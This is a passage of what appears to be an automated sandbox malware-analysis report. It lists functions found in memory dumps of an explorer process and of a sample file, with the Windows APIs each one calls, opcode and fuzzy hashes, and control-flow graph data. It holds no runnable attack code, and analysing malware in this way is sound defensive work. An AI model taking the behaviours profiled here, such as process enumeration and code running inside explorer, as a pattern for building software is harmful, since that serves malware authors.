                                                                                                                                                                                                                                  • _initp_misc_cfltcvt_tab.LIBCMT ref: 0B30D99F
                                                                                                                                                                                                                                  • _initterm_e.LIBCMT ref: 0B30D9B2
                                                                                                                                                                                                                                  • _IsNonwritableInCurrentImage.LIBCMT ref: 0B30D9FB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1991439119-0
                                                                                                                                                                                                                                  • Opcode ID: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                                  • Instruction ID: 99378cdcef7115742195baf5c1dec2cc236e7f86d1fb4ea722441ba389ebb3f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 142ca55874e72eaa3db0a41388c4fe1e2abb69c32ca329fdf64d4b65bf31f656
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B011A531264A098FEB2CEFA8ECA57E673E5FF54340B744935C803D21B4EE389545CA81
                                                                                                                                                                                                                                  Function 0E0D2E00 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1264244614-0
                                                                                                                                                                                                                                  • Opcode ID: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                                  • Instruction ID: 2cef16d7bdf83fdbe90570eadddcafe897af2d52a50bfc41015245468166f038
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E117F3221878191DA20EB21E5503EAB3A5FB88794F844621DA9D47BA8DF2CC909CB40
                                                                                                                                                                                                                                  Function 0DF22E00 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1264244614-0
                                                                                                                                                                                                                                  • Opcode ID: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                                  • Instruction ID: d969f4f149126c5cae22f55dd078aae760d176aaffb5f0b793d132b75d95d36c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD11666221CA8592DB20DB29E9503BA7371FB89794F85C221DB9D47698DF7CC905CB40
                                                                                                                                                                                                                                  Function 101F2E00 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1264244614-0
                                                                                                                                                                                                                                  • Opcode ID: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                                  • Instruction ID: c5654fffbb0ae4394a04d1e4dece0c745d6f57a1ff967d7bea17904fc0a4e67f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4ae43106cd27e38552f330af00e7cfde6b8ca1cb6c56b1c60f68114623f8363
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2011903621478981DB20DB21E5513EEB375FB887D4F908221EA9D47AA8EF7CD609CF00
                                                                                                                                                                                                                                  Function 0E0D4E3C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: strncmp
                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                  • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                                  • Opcode ID: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                                  • Instruction ID: dfc61d2fe851c98bdcff7ef8c8286fafc11ca103bc319b2807adfc7bdced062d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9018F7172468082EB80CB27F54075D63A0FB88FC8F484416DF2857B4DDA39C9D48B04
                                                                                                                                                                                                                                  Function 0DF24E3C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: strncmp
                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                  • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                                  • Opcode ID: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                                  • Instruction ID: af5c6937c3aa8f6ae703774ed0f0be059d814b059174aca1275e531788ceadec
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F018F6171499182EB40CB6BF5407296360F788FC8F498027DF1D87F89DE69C9918B14
                                                                                                                                                                                                                                  Function 101F4E3C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: strncmp
                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                  • API String ID: 1114863663-2658103896
                                                                                                                                                                                                                                  • Opcode ID: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                                  • Instruction ID: 815dbccdb37967a07bf355f2ca8aa0bf227c220133e8e8fc41b0044c5c8c9c70
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 354d05fe94306a40858a042af1019efa880169b646805dad5c3a15f0767e2801
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2018B7271458086EB40CB67F58475AA361F788FC8F494026EF588BF4ADE3DC9958B04
                                                                                                                                                                                                                                  Function 0E0D8D90 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 993137029-0
                                                                                                                                                                                                                                  • Opcode ID: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                                  • Instruction ID: 7c4a8ce4f85a9b65f05a61af6131ad2934688b13da0d4d7d2789f483be094627
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58016936715B8186EB58DF66E89431973A1FB88BC0F088425DB9A13B54CF38D4AACB04
                                                                                                                                                                                                                                  Function 101F8D90 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 993137029-0
                                                                                                                                                                                                                                  • Opcode ID: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                                  • Instruction ID: 1762c80be4e8f93183ef363b42edeacdeb7604c1eb84f1d0f4c16ad3327271ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc4ac7eada6cea8646bd1c9f1b0a4f22a1aa1c3d04cc9ff59fdbbbcdb0f513c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36016D36615A54C6DB84CF66E99875A7361FB98BC0F048125DA5A03758CF38C496C700
                                                                                                                                                                                                                                  Function 0E0EA840 Relevance: 5.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3605230531-0
                                                                                                                                                                                                                                  • Opcode ID: a124ef896439d6a7521b1c8819a8550ab7b9eb55e41cdcd60e45ad331ac4b990
                                                                                                                                                                                                                                  • Instruction ID: 6f851f3321ea7d7db452bd7d2c40c167f35acde1581a66988f8873b2073a351e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a124ef896439d6a7521b1c8819a8550ab7b9eb55e41cdcd60e45ad331ac4b990
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E116176A109C5D2EB448F25E9A43D933B0F79CB48F8558A2CB1A57624EF38C5CAC704
                                                                                                                                                                                                                                  Function 0DF3A840 Relevance: 5.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3605230531-0
                                                                                                                                                                                                                                  • Opcode ID: 6bcaef1c674543200f1b7ab790375821c1d432e27147d9abbbee8d698c392281
                                                                                                                                                                                                                                  • Instruction ID: 8779691e85c9d675552e83ee9eb839fc0ef5ae2c83cd3204bff06a3c04586d80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bcaef1c674543200f1b7ab790375821c1d432e27147d9abbbee8d698c392281
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F411A572610946D2EB148F5AE8943B53370F748748F55D133C61B47AA4EF38C5CAC324
                                                                                                                                                                                                                                  Function 1020A840 Relevance: 5.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$CriticalEnterSectionmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3605230531-0
                                                                                                                                                                                                                                  • Opcode ID: a124ef896439d6a7521b1c8819a8550ab7b9eb55e41cdcd60e45ad331ac4b990
                                                                                                                                                                                                                                  • Instruction ID: 2df3fdda66eeb49b97677705d5209883131df35cda9d79e38d261424e3462e4e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a124ef896439d6a7521b1c8819a8550ab7b9eb55e41cdcd60e45ad331ac4b990
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9115E72610A45D2EB048F25E8E83D93361F79CB48F856513DA9A4E624DFBCC5DAC314

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:9.8%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:63
                                                                                                                                                                                                                                  Total number of Limit Nodes:12
                                                                                                                                                                                                                                  execution_graph 39719 6996cd9 39720 6996c74 39719->39720 39721 6996ce2 39719->39721 39725 6997d69 39720->39725 39729 6997d78 39720->39729 39722 6996c95 39726 6997dc0 39725->39726 39728 6997dc9 39726->39728 39733 6997910 39726->39733 39728->39722 39730 6997dc0 39729->39730 39731 6997910 LoadLibraryW 39730->39731 39732 6997dc9 39730->39732 39731->39732 39732->39722 39734 6997ec0 LoadLibraryW 39733->39734 39736 6997f35 39734->39736 39736->39728 39737 d0d300 DuplicateHandle 39738 d0d396 39737->39738 39739 85b06f8 39740 85b0883 39739->39740 39741 85b071e 39739->39741 39741->39740 39744 85b0978 PostMessageW 39741->39744 39746 85b0970 39741->39746 39745 85b09e4 39744->39745 39745->39741 39747 85b0978 PostMessageW 39746->39747 39748 85b09e4 39747->39748 39748->39741 39749 d0d0b8 39750 d0d0fe GetCurrentProcess 39749->39750 39752 d0d150 GetCurrentThread 39750->39752 39753 d0d149 39750->39753 39754 d0d186 39752->39754 39755 d0d18d GetCurrentProcess 39752->39755 39753->39752 39754->39755 39756 d0d1c3 GetCurrentThreadId 39755->39756 39758 d0d21c 39756->39758 39759 d0ad38 39763 d0ae30 39759->39763 39768 d0ae20 39759->39768 39760 d0ad47 39764 d0ae64 39763->39764 39765 d0ae41 39763->39765 39764->39760 39765->39764 39766 d0b068 GetModuleHandleW 39765->39766 39767 d0b095 39766->39767 39767->39760 39769 d0ae41 39768->39769 39770 d0ae64 39768->39770 39769->39770 39771 d0b068 GetModuleHandleW 39769->39771 39770->39760 39772 d0b095 39771->39772 39772->39760 39773 d04668 39774 d04684 39773->39774 39775 d04696 39774->39775 39777 d047a0 39774->39777 39778 d047c5 39777->39778 39782 d048b0 39778->39782 39786 d048a1 39778->39786 39784 d048d7 39782->39784 39783 d049b4 39784->39783 39790 d04248 39784->39790 39787 d048b0 39786->39787 39788 d04248 CreateActCtxA 39787->39788 39789 d049b4 39787->39789 39788->39789 39791 d05940 CreateActCtxA 39790->39791 39793 d05a03 39791->39793 39794 6991521 39795 699150b 39794->39795 39797 69901a0 39794->39797 39796 69909be LdrInitializeThunk 39796->39797 39797->39795 39797->39796

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 06992298 Relevance: 2.9, Strings: 2, Instructions: 364COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 316 6992298-69922ca 317 69922cc 316->317 318 69922d1-699239d 316->318 317->318 323 699239f-69923ad 318->323 324 69923b2 318->324 325 6992860-699286d 323->325 389 69923b8 call 6992f7d 324->389 390 69923b8 call 69930de 324->390 391 69923b8 call 699303e 324->391 392 69923b8 call 6992ed3 324->392 326 69923be-69923e7 387 69923ed call 699f1d0 326->387 388 69923ed call 699f1c0 326->388 328 69923f3-699246e 334 69927ef-6992819 328->334 336 699281f-699285e 334->336 337 6992473-6992689 334->337 336->325 364 6992695-69926df 337->364 367 69926e1 364->367 368 69926e7-69926e9 364->368 369 69926eb 367->369 370 69926e3-69926e5 367->370 371 69926f0-69926f7 368->371 369->371 370->368 370->369 372 69926f9-6992770 371->372 373 6992771-6992797 371->373 372->373 375 6992799-69927a2 373->375 376 69927a4-69927b0 373->376 378 69927b6-69927d5 375->378 376->378 382 69927eb-69927ec 378->382 383 69927d7-69927ea 378->383 382->334 383->382 387->328 388->328 389->326 390->326 391->326 392->326
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1581963115.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6990000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .$1
                                                                                                                                                                                                                                  • API String ID: 0-1839485796
                                                                                                                                                                                                                                  • Opcode ID: 52e4b34abeb3b3ca318743a5afe7182d4bc113cc03263ba3e35132ad0957d643
                                                                                                                                                                                                                                  • Instruction ID: 1d7605058020fb9ca5278913292514b1a6d796c0eba9a9965b0626c8ad2fa8a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52e4b34abeb3b3ca318743a5afe7182d4bc113cc03263ba3e35132ad0957d643
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFF1D174E01228CFEB68DF69C954B9DBBB2BF89301F1085EAD509AB250DB355E81CF50
                                                                                                                                                                                                                                  Function 06990040 Relevance: 2.6, APIs: 1, Instructions: 1088COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 393 6990040-699006b 394 699006d 393->394 395 6990072-699010e 393->395 394->395 398 6990160-699019b 395->398 399 6990110-699015a 395->399 404 69914ec-6991505 398->404 399->398 407 699150b-6991531 404->407 408 69901a0-69902d9 404->408 410 6991540 407->410 411 6991533-699153f 407->411 423 69902e4-69902f6 408->423 415 6991541 410->415 411->410 415->415 635 69902fc call 69915d8 423->635 636 69902fc call 69915e8 423->636 637 69902fc call 6991a3c 423->637 638 69902fc call 699158e 423->638 639 69902fc call 6991a21 423->639 424 6990302-6990330 426 69914a4-69914be 424->426 428 6990335-6990479 426->428 429 69914c4-69914e8 426->429 445 699047b-69904a7 428->445 446 69904ac-69904f3 428->446 429->404 449 699053b-69905c3 445->449 451 6990519-6990528 446->451 452 69904f5-6990517 446->452 462 69905ce-69905e6 449->462 458 699052e-699053a 451->458 452->458 458->449 463 69905ef-69906f3 462->463 474 6990745-6990750 463->474 475 69906f5-699073f 463->475 633 6990756 call 6992110 474->633 634 6990756 call 6992120 474->634 475->474 477 699075c-69907c0 482 6990812-699081d 477->482 483 69907c2-699080c 477->483 640 6990823 call 6992110 482->640 641 6990823 call 6992120 482->641 483->482 484 6990829-699088c 490 69908de-69908e9 484->490 491 699088e-69908d8 484->491 629 69908ef call 6992110 490->629 630 69908ef call 6992120 490->630 491->490 492 69908f5-699092e 496 6990934-6990997 492->496 497 6990da7-6990e2e 492->497 505 6990999 496->505 506 699099e-69909a1 496->506 508 6990e8c-6990e97 497->508 509 6990e30-6990e86 497->509 505->506 510 69909ac-69909ee LdrInitializeThunk 506->510 631 6990e9d call 6992110 508->631 632 6990e9d call 6992120 508->632 509->508 515 69909f5-6990b1d 510->515 513 6990ea3-6990f30 524 6990f8e-6990f99 513->524 525 6990f32-6990f88 513->525 545 6990d8a-6990da6 515->545 546 6990b23-6990b75 515->546 627 6990f9f call 6992110 524->627 628 6990f9f call 6992120 524->628 525->524 528 6990fa5-699101d 537 699107b-6991086 528->537 538 699101f-6991075 528->538 644 699108c call 6992110 537->644 645 699108c call 6992120 537->645 538->537 542 6991092-69910fe 554 6991150-699115b 542->554 555 6991100-699114a 542->555 545->497 556 6990bc7-6990c42 546->556 557 6990b77-6990bc1 546->557 642 6991161 call 6992110 554->642 643 6991161 call 6992120 554->643 555->554 572 6990c94-6990d0e 556->572 573 6990c44-6990c8e 556->573 557->556 561 6991167-69911ac 570 69912e2-699148b 561->570 571 69911b2-69912e1 561->571 624 699148d-69914a2 570->624 625 69914a3 570->625 571->570 587 6990d60-6990d89 572->587 588 6990d10-6990d5a 572->588 573->572 587->545 588->587 624->625 625->426 627->528 628->528 629->492 630->492 631->513 632->513 633->477 634->477 635->424 636->424 637->424 638->424 639->424 640->484 641->484 642->561 643->561 644->542 645->542
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1581963115.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_6990000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ef4f82983b2914a174019da2496d815f910bec1cfe0e2c61b2fe31daea99427d
                                                                                                                                                                                                                                  • Instruction ID: 7ed34eb4cf9e8e6640d25b7cc97ed11777b8f17d42a3ee1646f17c6c091d03e0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef4f82983b2914a174019da2496d815f910bec1cfe0e2c61b2fe31daea99427d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AC2A074E012298FDB64DF28D898B9DBBB2FB89301F5085E9D409A7354DB34AE81CF54
                                                                                                                                                                                                                                  Function 00D0D0B8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00D0D136
                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00D0D173
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00D0D1B0
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00D0D209
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000009.00000002.1564835227.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_d00000_2FDD.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2063062207-0
